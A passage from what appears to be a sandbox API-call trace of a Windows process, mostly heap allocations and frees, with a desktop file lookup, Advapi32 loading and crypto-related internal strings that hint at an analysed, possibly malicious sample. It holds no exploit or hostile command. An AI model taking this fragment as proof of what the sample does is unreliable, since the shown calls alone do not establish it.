hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0128.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0128.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0128.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0128.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0128.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0128.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0128.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0128.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0128.861] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0128.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0128.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0128.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0128.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0128.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0128.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0128.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0128.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0128.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0128.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0128.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0128.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0128.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.864] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce390d0, ftCreationTime.dwHighDateTime=0x1d5efbf, ftLastAccessTime.dwLowDateTime=0x4f30df70, ftLastAccessTime.dwHighDateTime=0x1d5ed2a, ftLastWriteTime.dwLowDateTime=0x4f30df70, ftLastWriteTime.dwHighDateTime=0x1d5ed2a, nFileSizeHigh=0x0, nFileSizeLow=0x8d0a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="-ibxuw5BT.mp4", cAlternateFileName="-IBXUW~1.MP4")) returned 0x41ac200 [0128.865] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0128.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0128.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0128.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0128.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0128.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0128.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0128.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0128.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0128.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0128.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.866] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0128.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.866] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0128.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.867] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0128.867] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0128.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0128.867] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0128.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0128.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0128.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0128.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0128.868] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0128.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0128.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0128.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0128.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0128.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0128.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0128.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.869] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0128.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0128.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0128.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.870] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0128.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0128.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0128.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.870] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0128.870] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0128.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0128.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27f0 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0128.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0128.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0128.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0128.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0128.872] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0128.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.872] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0128.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0128.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0128.873] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0128.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0128.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0128.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.873] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0128.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0128.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 